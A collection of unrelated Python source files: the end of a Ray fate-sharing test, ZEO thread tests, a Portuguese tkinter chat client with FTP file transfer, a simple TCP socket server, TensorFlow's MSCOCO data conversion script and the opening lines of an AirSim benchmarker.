})
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
ThreadTests.py
|
##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Compromising positions involving threads."""
import threading
from ZODB.Connection import TransactionMetaData
from ZODB.tests.StorageTestBase import zodb_pickle, MinPO
import ZEO.Exceptions
ZERO = '\0'*8
class BasicThread(threading.Thread):
def __init__(self, storage, doNextEvent, threadStartedEvent):
self.storage = storage
self.trans = TransactionMetaData()
self.doNextEvent = doNextEvent
self.threadStartedEvent = threadStartedEvent
self.gotValueError = 0
self.gotDisconnected = 0
threading.Thread.__init__(self)
self.setDaemon(1)
def join(self):
threading.Thread.join(self, 10)
assert not self.isAlive()
class GetsThroughVoteThread(BasicThread):
# This thread gets partially through a transaction before it turns
# execution over to another thread. We're trying to establish that a
# tpc_finish() after a storage has been closed by another thread will get
# a ClientStorageError error.
#
    # This class does a tpc_begin(), store(), tpc_vote() and is waiting
# to do the tpc_finish() when the other thread closes the storage.
def run(self):
self.storage.tpc_begin(self.trans)
oid = self.storage.new_oid()
self.storage.store(oid, ZERO, zodb_pickle(MinPO("c")), '', self.trans)
self.storage.tpc_vote(self.trans)
self.threadStartedEvent.set()
self.doNextEvent.wait(10)
try:
self.storage.tpc_finish(self.trans)
except ZEO.Exceptions.ClientStorageError:
self.gotValueError = 1
self.storage.tpc_abort(self.trans)
class GetsThroughBeginThread(BasicThread):
# This class is like the above except that it is intended to be run when
# another thread is already in a tpc_begin(). Thus, this thread will
# block in the tpc_begin until another thread closes the storage. When
# that happens, this one will get disconnected too.
def run(self):
try:
self.storage.tpc_begin(self.trans)
except ZEO.Exceptions.ClientStorageError:
self.gotValueError = 1
class ThreadTests(object):
# Thread 1 should start a transaction, but not get all the way through it.
# Main thread should close the connection. Thread 1 should then get
# disconnected.
def checkDisconnectedOnThread2Close(self):
doNextEvent = threading.Event()
threadStartedEvent = threading.Event()
thread1 = GetsThroughVoteThread(self._storage,
doNextEvent, threadStartedEvent)
thread1.start()
threadStartedEvent.wait(10)
self._storage.close()
doNextEvent.set()
thread1.join()
self.assertEqual(thread1.gotValueError, 1)
# Thread 1 should start a transaction, but not get all the way through
# it. While thread 1 is in the middle of the transaction, a second thread
    # should start a transaction, and it will block in the tpc_begin() --
# because thread 1 has acquired the lock in its tpc_begin(). Now the main
# thread closes the storage and both sub-threads should get disconnected.
def checkSecondBeginFails(self):
doNextEvent = threading.Event()
threadStartedEvent = threading.Event()
thread1 = GetsThroughVoteThread(self._storage,
doNextEvent, threadStartedEvent)
thread2 = GetsThroughBeginThread(self._storage,
doNextEvent, threadStartedEvent)
thread1.start()
threadStartedEvent.wait(1)
thread2.start()
self._storage.close()
doNextEvent.set()
thread1.join()
thread2.join()
self.assertEqual(thread1.gotValueError, 1)
self.assertEqual(thread2.gotValueError, 1)
# Run a bunch of threads doing small and large stores in parallel
def checkMTStores(self):
threads = []
for i in range(5):
t = threading.Thread(target=self.mtstorehelper)
threads.append(t)
t.start()
for t in threads:
t.join(30)
        for t in threads:
            self.assertFalse(t.isAlive())
# Helper for checkMTStores
def mtstorehelper(self):
name = threading.currentThread().getName()
objs = []
for i in range(10):
objs.append(MinPO("X" * 200000))
objs.append(MinPO("X"))
for obj in objs:
self._dostore(data=obj)
|
client.py
|
from ftpserver import FTP_HOST, FTP_PORT
import socket
from threading import Thread
import os
import tkinter as tk
from tkinter import *
from tkinter import font
from tkinter.font import *
from tkinter import filedialog
from ftplib import FTP
import re
FTP_HOST = '192.168.15.141'
FTP_PORT = 21
BUFFERSIZE = 4096
filename = ""
# Function responsible for sending messages to the server
def envia_mensagens(event=None):
#while True:
msg = messageInp.get()
    messageInp.delete(0, END)  # Clear the text field
    # If the user sends a message saying "fim", they leave the room.
if msg.lower() == "fim":
s.sendall('[SERVIDOR] {} saiu da sala.'.format(username).encode('utf-8'))
elif msg.lower() == "receber_arquivo":
recebe_arquivo()
else:
s.sendall('{}: {}'.format(username, msg).encode('utf-8')) # (3)
def envia_arquivo(event=None):  # sends files to the server via FTP
# try:
print('[+] Iniciando sessão (envio)...')
session = FTP(FTP_HOST, user='saet', passwd='aps')
session.login()
print(session.pwd())
session.cwd('server_data')
print('[+] Sessão concluída')
    # Ask the dialog for a path string instead of parsing the repr of a file
    # object; askopenfilename() returns the selected path directly.
    filepath = filedialog.askopenfilename()
    print('[+] File: ', filepath)
    global filename
    filename = os.path.basename(filepath)
    print('[+] Filename: ', filename)
    with open(filepath, 'rb') as f:
        session.storbinary('STOR ' + filename, f)
# session.retrlines('LIST')
session.quit()
s.sendall('{}: {}'.format(username, "Arquivo enviado").encode('utf-8'))
# except Exception as e:
# print('Erro encontrado: ', e)
def recebe_arquivo(event=None):
print('[+] Iniciando sessão (receber)...')
session = FTP(FTP_HOST, user='saet', passwd='aps')
session.login()
print(session.pwd())
session.cwd('server_data')
print('[+] Sessão concluída')
session.retrlines('NLST')
filename = session.nlst()
    with open(filename[-1], "wb") as f:
        session.retrbinary(f"RETR {filename[-1]}", f.write)
session.quit()
s.sendall('{}: {}'.format(username, "Arquivo recebido").encode('utf-8'))
# Function responsible for receiving messages from the server
def recebe_mensagens():
    # Infinite loop so messages keep being received while the connection to the
    # server is alive
    while True:
        print("Receiving message...")
        msg = s.recv(BUFFERSIZE)  # receives the message from the server (1)
        # Check whether the connection to the server is still up
        # ("if msg" and "if msg == True" are equivalent here)
        if msg:
            print("Printing Message...")
            # Print the message (2)
            chatBoxCont.insert(tk.END, msg)
        else:
            print('\n[CLIENTE] Conexão perdida com o servidor!')
            print('\n[CLIENTE] Saindo...')
            s.close()  # Close the pending connection
            os._exit(0)  # Shut down the program
root = tk.Tk()  # start the main window
root.title("Chatbox")  # Window title
root.geometry("1280x720")  # Window size
root.resizable(False, False)  # Prevent the user from resizing the window
#-----------------------------------------------------------------------------------------------------
# User list on the left side
# master = root | makes the "chatList" frame belong to the main window instead of some random frame where it should not be
chatList = tk.Frame(master=root, width = 300, bg = "#156950")
# fill=tk.Y --> fills the rest of the window along the Y axis (responsiveness and simplicity)
# side=tk.LEFT --> aligns the list on the left side of the window
# .pack() --> draws the widget (in this case the chatList frame) on the screen
chatList.pack(fill = tk.Y, side=tk.LEFT)
# Font configuration
f = font.Font(family="Helvetica", size=20)
f2 = font.Font(family="Helvetica", size=15)
f3 = font.Font(family="Helvetica", size=12)
# Profile picture for the users (purely visual flair)
pfp = PhotoImage(file = "Images/ProfilePicture.png")
# Button for each user in the list, used to switch chats
userLb = tk.Button(chatList, text="Tratamento Rio", height=70, width=230, pady=2, anchor=tk.W, relief="solid", bg="#156950", bd=3, fg="white", activebackground="#1C8767", font=f2, image=pfp, compound=LEFT)
userLb.pack()
corpIcon = tk.PhotoImage(file = "Images/corpIcon.png")
corpL = tk.Label(chatList, image=corpIcon, bg="#156950")
corpL.pack(side = tk.BOTTOM)
name = tk.Label(chatList, text = "Companhia de Tratamento de Rios", bg = "#156950", fg="white", font=f3)
name.pack(side = tk.BOTTOM)
#-----------------------------------------------------------------------------------------------------
# Create and configure the top bar
upperBar = tk.Frame(root, height=80, bg="#08382a", padx=10, pady=10)
upperBar.pack(fill=tk.X, side=TOP)
# Create and configure the current chat's user name label
currentUser = tk.Label(upperBar, text="Tratamento Rio", font=f, bg="#08382a", fg="white")
currentUser.pack(fill=tk.BOTH, side=tk.LEFT)
#-----------------------------------------------------------------------------------------------------
# Chat container (messages)
chatF = font.Font(family="Helvetica", size = 14)
chatBoxCont = tk.Listbox(master = root, height=25, width=170, font=chatF)
chatBoxCont.pack(side=tk.TOP)
#-----------------------------------------------------------------------------------------------------
# Create and configure the container for the message to be sent
msgBoxCont = tk.Frame(master = root, height=100, bd=1, relief="solid", padx=10, pady=20)
msgBoxCont.pack(fill=tk.X, side=tk.BOTTOM)
# Create and configure the user's message input box
messageInp = tk.Entry(msgBoxCont, bg="#cbcbcb", width=130)
messageInp.bind("<Return>", envia_mensagens)
messageInp.pack(side=tk.LEFT, fill=tk.Y)
bIcon = PhotoImage(file = "Images/SendIcon.png")  # The send icon on the right
# Create and configure the send-message button
sendB = tk.Button(msgBoxCont, image=bIcon, compound=CENTER, height=80, width=80, bd=0, relief="flat", command=envia_mensagens)
sendB.pack(side=tk.RIGHT)
plusbtn = font.Font(size = 20, family="Helvetica")
fileUpload = tk.Button(msgBoxCont, text="+", height=20, width=15, bd=0, relief="flat", font=plusbtn, command=envia_arquivo)
fileUpload.pack(side=tk.LEFT)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
global temp_name
temp_name = tk.StringVar()
def handle_event():
    # Read the username typed into the login window; the window itself is
    # destroyed by enterChat() once a non-empty name has been entered.
    temp_name = usernamefield.get()
    return temp_name
def enterChat():
global username
username = handle_event()
if username != "":
loginRoot.destroy()
h = '192.168.15.141'
p = 8080
        # Variable representing the connection to the server
global s
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Server connection setup
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect((h, p))
print("[SERVIDOR] Online")
        # Announce who joined the room
s.sendall('[SERVIDOR] {} entrou na sala.'.format(username).encode('utf-8'))
print('{}: '.format(username), end = '')
recebe = Thread(target=recebe_mensagens)
recebe.start()
loginRoot = tk.Toplevel(root)
loginRoot.geometry('350x200')
loginRoot.resizable(False, False)
loginRoot.title('Tela de Login')
f = font.Font(size = 25, family='Helvetica')
label = tk.Label(master = loginRoot, text = "Tela de login", foreground='black', font=f)
label.pack(side=tk.TOP)
midframe = tk.Frame(master = loginRoot)
midframe.pack(fill=tk.X)
tfLabel = tk.Label(master = midframe, text="Insira seu nome de usuário: ", foreground='black')
tfLabel.pack(padx=10, pady=35, side=tk.LEFT)
usernamefield = tk.Entry(master = midframe, bg='white', width=25, textvariable=temp_name)
usernamefield.pack(padx=2, side=tk.LEFT, ipady=3, fill=tk.X)
submit = tk.Button(master = loginRoot, text = "Enviar", width=20, height=2, command=enterChat)
submit.pack(side=tk.BOTTOM, pady=15)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
try:
root.mainloop()
except ConnectionRefusedError:
print("[CLIENTE] Conexão Recusada. O servidor está fechado.")
|
server.py
|
import socket
import threading
import time
# Address
HOST = '' # server address, bind self
PORT = 8089 # 9999
print('Host:', HOST, 'Port :', PORT)
# Configure socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
print('bind ok')
s.listen(3)  # Backlog: maximum number of queued (not yet accepted) connections
print('Waiting for connection...')
def main():
while True:
print('start loop in main')
# accept a new connection
sock, addr = s.accept()
print('receive msg from client')
        # create a new thread to handle the TCP connection
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(0.5)
print('Receive data is:', data.decode('utf-8'))
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello! ' + addr[0] + ' : ' + str(addr[1])).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
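# Illustrative sketch (not part of the original script): a minimal client for
# this server, defined here but never called. Running it from another process
# on the same machine (an assumption) exercises the tcplink() handler above.
def example_client(host='127.0.0.1', port=PORT):
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.connect((host, port))
    print(c.recv(1024))   # b'Welcome!'
    c.sendall(b'hello')
    print(c.recv(1024))   # b'Hello! <client ip> : <client port>'
    c.sendall(b'exit')    # asks tcplink() to break out of its loop and close
    c.close()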
if __name__ == '__main__':
print('Start main')
main()
|
build_mscoco_data.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_train2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with tf.gfile.FastGFile(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
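# Illustrative sketch (not part of the original script): how a record written by
# _to_sequence_example() could be parsed back. The key names match the fields
# described in the module docstring; the exact parsing spec is an assumption,
# shown for clarity only and unused by the conversion pipeline.
def _parse_sequence_example(serialized):
  """Parses a serialized SequenceExample produced by this script.

  Args:
    serialized: A scalar string Tensor holding a serialized SequenceExample.

  Returns:
    A tuple (image_id, encoded_image, caption, caption_ids).
  """
  context, sequence = tf.parse_single_sequence_example(
      serialized,
      context_features={
          "image/image_id": tf.FixedLenFeature([], dtype=tf.int64),
          "image/data": tf.FixedLenFeature([], dtype=tf.string),
      },
      sequence_features={
          "image/caption": tf.FixedLenSequenceFeature([], dtype=tf.string),
          "image/caption_ids": tf.FixedLenSequenceFeature([], dtype=tf.int64),
      })
  return (context["image/image_id"], context["image/data"],
          sequence["image/caption"], sequence["image/caption_ids"])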
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
    thread_index: Integer thread identifier within [0, len(ranges)).
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
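# Illustrative sketch (not part of the original script): how the word counts
# file written by _create_vocab() could be loaded back into a Vocabulary. It
# assumes the "<word> <count>" per-line format produced above, with the 0-based
# line number as the word id and the unknown id one past the last word.
def _load_vocab_from_file(word_counts_file):
  """Rebuilds a Vocabulary object from a word counts file."""
  with tf.gfile.FastGFile(word_counts_file, "r") as f:
    words = [line.split()[0] for line in f.readlines() if line.strip()]
  vocab_dict = dict((word, word_id) for word_id, word in enumerate(words))
  return Vocabulary(vocab_dict, unk_id=len(words))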
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
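# For example (hypothetical input, using whatever start/end words the flags define):
#   "A dog runs." -> [FLAGS.start_word, "a", "dog", "runs", ".", FLAGS.end_word]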
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Proccessing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
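# e.g. with FLAGS.num_threads == 8, any shard count below 8 or any multiple of 8 is accepted.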
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
|
baseline_racer_image_benchmarker.py
|
from argparse import ArgumentParser
import airsimneurips as airsim
import time
import utils
import threading
import numpy as np
import cv2
from baseline_racer import BaselineRacer
class BaselineRacerImageBenchmarker(BaselineRacer):
def __init__(self,
img_benchmark_type = 'simGetImage',
